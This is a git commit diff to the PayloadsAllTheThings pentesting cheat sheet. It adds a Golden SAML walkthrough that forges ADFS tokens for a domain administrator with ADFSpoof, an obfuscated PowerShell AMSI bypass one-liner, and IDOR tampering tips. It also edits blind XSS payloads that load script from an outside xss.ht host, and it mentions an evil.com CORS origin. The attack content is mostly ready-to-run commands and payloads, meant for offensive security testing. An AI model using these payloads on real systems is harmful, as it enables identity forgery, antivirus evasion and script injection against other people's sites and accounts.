ADFS Golden SAML

This commit is contained in:
Swissky 2022-11-07 10:10:21 +01:00
parent c17ae602fc
commit 3e9ef2efbe
7 changed files with 73 additions and 12 deletions

View file

@ -11,9 +11,11 @@
## Tools
* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
* [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
* [chenjj/CORScanner - Fast CORS misconfiguration vulnerabilities scanner](https://github.com/chenjj/CORScanner)
* [PostMessage POC Builder - @honoki](https://tools.honoki.net/postmessage.html)
## Prerequisites
* BURP HEADER> `Origin: https://evil.com`

View file

@ -6,14 +6,15 @@
* [Tools](#tools)
* [Exploit](#exploit)
* [IDOR Tips](#idor-tips)
* [Examples](#examples)
* [References](#references)
## Tools
- Burp Suite plugin Authz
- Burp Suite plugin AuthMatrix
- Burp Suite plugin Authorize
- [BApp Store > Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e)
- [BApp Store > AuthMatrix](https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e)
- [BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f)
## Exploit
@ -43,6 +44,15 @@ The value of a parameter is used directly to access application functionality
http://foo.bar/accessPage?menuitem=12
```
### IDOR Tips
* Change the HTTP request: POST → PUT
* Change the content type: XML → JSON
* Increment/decrement numerical values (1,2,3,..)
* GUID/UUID might be weak
* Transform numerical values to arrays: `{"id":19} → {"id":[19]}`
## Examples
* [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)

View file

@ -86,6 +86,8 @@
- [ESC9 - No Security Extension](#esc9---no-security-extension)
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
- [Pass-The-Certificate](#pass-the-certificate)
- [Active Directory Federation Services](#active-directory-federation-services)
- [ADFS - Golden SAML](#adfs---golden-saml)
- [UnPAC The Hash](#unpac-the-hash)
- [Shadow Credentials](#shadow-credentials)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
@ -1592,6 +1594,8 @@ Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -
> One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it.
:warning: You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and `ManagedPasswordIntervalInDays`, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future.
* Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA)
```ps1
# Enumerate all gMSAs
@ -2639,6 +2643,43 @@ Jane@corp.local is allowed to enroll in the certificate template ESC9 that speci
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
```
### Active Directory Federation Services
#### ADFS - Golden SAML
Requirements:
* ADFS service account
* The private key (PFX with the decryption password)
Exploit:
* Use [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) to dump ADFS informations
* Convert PFX and Private key to binary format
```ps1
# For the pfx
echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin
# For the private key
echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin
```
* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof)
```ps1
mkdir ADFSpoofTools
cd $_
git clone https://github.com/dmb2168/cryptography.git
git clone https://github.com/mandiant/ADFSpoof.git
virtualenv3 venvADFSSpoof
source venvADFSSpoof/bin/activate
pip install lxml
pip install signxml
pip uninstall -y cryptography
cd cryptography
pip install -e .
cd ../ADFSpoof
pip install -r requirements.txt
python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls
/SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
```
### UnPAC The Hash
Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.
@ -4044,3 +4085,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)

View file

@ -759,6 +759,15 @@ Add-Type -TypeDefinition $Winpatch -Language CSharp
[patch]::it()
```
## Other interesting AMSI bypass
* [tihanyin/PSSW100AVB/AMSI_bypass_2021_09.ps1](https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1)
```ps1
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " " ).GetField([string](38..51|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " ",'Non' + 'Public,Static').SetValue($null,$true)
```
## AMSI.fail
> AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 MiB

View file

@ -23,8 +23,11 @@
- [Burp > Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa)
- [ZAP > FileUpload AddOn](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/)
## Exploits
![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true)
### Defaults extensions
* PHP Server

View file

@ -501,14 +501,9 @@ XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https:
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
```javascript
"><script src=//yoursubdomain.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script>
<script>$.getScript("//yoursubdomain.xss.ht")</script>
```xml
"><script src=//<your.subdomain>.xss.ht></script>
<script>$.getScript("//<your.subdomain>.xss.ht")</script>
```
### Other Blind XSS tools